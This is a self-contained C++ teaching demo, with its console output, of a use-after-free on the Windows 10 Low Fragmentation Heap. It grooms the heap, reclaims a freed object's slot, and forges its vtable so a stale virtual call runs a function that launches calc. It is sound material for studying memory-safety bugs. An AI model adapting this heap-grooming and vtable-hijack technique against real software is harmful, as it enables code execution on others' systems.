use-after-free on the Low Fragmentation Heap (built without /SDL, Windows 10, Visual Studio 2015)
C:\Users\user\Documents\Visual Studio 2015\Projects\20170603_ssmjp\Debug>20170603_ssmjp.exe
meow
[+] cat = 0121A9C8
[+] p[0] = 0121A928
[+] p[1] = 0121A838
[+] p[2] = 0121A9C8
[+] break after 3 times allocation
boom!
C:\Users\user\Documents\Visual Studio 2015\Projects\20170603_ssmjp\Release>20170603_ssmjp.exe
meow
[+] cat = 00B7CF90
[+] p[0] = 00B7D080
[+] p[1] = 00B7D0B0
[+] p[2] = 00B7D0E0
[+] p[3] = 00B7CF90
[+] break after 4 times allocation
boom!
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
// Object whose first word is a vtable pointer (it has a virtual method)
// followed by a 0x20-byte buffer. main() relies on that layout: the object
// is sized to fall in the same heap bucket as the 0x24-byte char arrays
// main() allocates, so a freed Cat and a later char[0x24] can occupy the
// same LFH slot. (0x24 = 4-byte vptr + 0x20 on the 32-bit build the
// transcript above shows -- its pointers are 8 hex digits.)
class Cat {
    char name[0x20]; // never read or written here; presumably only pads the object to the target size
public:
    virtual void cry() { puts("meow"); }; // the virtual call main() makes before and after the delete
};
// Routine the demo diverts the freed Cat's virtual call to. It announces
// itself on stdout, launches calc through WinExec as a visible marker, and
// then terminates the process with exit code 1, so nothing in main() runs
// after the hijacked call.
void boom()
{
    static const char kMarker[] = "boom!";
    puts(kMarker);
    WinExec("calc", SW_SHOWNORMAL); // marker only; return value deliberately ignored
    ExitProcess(1);                 // never returns
}
// Demonstrates a use-after-free on the Windows Low Fragmentation Heap:
// a Cat is freed, its slot is re-obtained through same-size allocations,
// the first word of that slot (where the vptr lives) is replaced, and the
// stale pointer is then used for a virtual call. Returns 0 only if that
// stale call does not reach boom(), which exits the process itself.
int main()
{
    // Warm-up allocations for the 0x24-byte bucket: per the author's
    // comment, 0x12 (18) requests of this size are what switch the LFH on
    // for that bucket -- confirm against the target heap build. The blocks
    // are intentionally never freed.
    // enable LFH for size 0x24
    void *p;
    for (int i = 0; i < 0x12; i++) {
        p = new char[0x24]; // p is assigned on every iteration, so it is set before use below
    }
    // /sdl's delete-pointer sanitization would (as I understand it) overwrite
    // `cat` with a non-dereferenceable value after the delete, so the stale
    // call at the end would fault instead of reaching the replaced vtable.
    // must disable SDL checks (do not specify /SDL)
    Cat *cat = new Cat();
    cat->cry();
    printf("[+] cat = %p\n", cat);
    delete cat; // cat is NOT nulled: the dangling pointer is the defect under demonstration
    // Reclaim the freed slot: allocate 0x24-byte blocks until one comes back
    // at the address cat had. The transcript above shows this taking 3
    // allocations in Debug and 4 in Release; 0x100 just bounds the search.
    // Note there is no check after the loop -- if no block matched, p is an
    // unrelated allocation and the write below corrupts something else.
    for (int i = 0; i < 0x100; i++) {
        p = new char[0x24];
        printf("[+] p[%d] = %p\n", i, p);
        if (p == cat) {
            printf("[+] break after %d times allocation\n", i + 1);
            break;
        }
    }
    // Replace the slot's first word (Cat's vptr) with the address of `ptr`:
    // a stack variable holding boom's address, so `&ptr` acts as a fake
    // one-entry vtable whose slot 0 is boom. boom takes no arguments and
    // never returns, which is why the calling-convention mismatch with a
    // member-function slot does not matter here.
    // vtable overwrite
    void (*ptr)() = boom;
    *(void **)p = &ptr;
    // Use-after-free: virtual dispatch through the freed object now lands in
    // boom(). A correct program frees `cat` exactly once and never touches
    // it afterwards (nulling it or using std::unique_ptr would have turned
    // this into an immediate fault rather than a control-flow hijack).
    // use-after-free
    cat->cry();
    return 0; // reached only if boom() was not invoked
}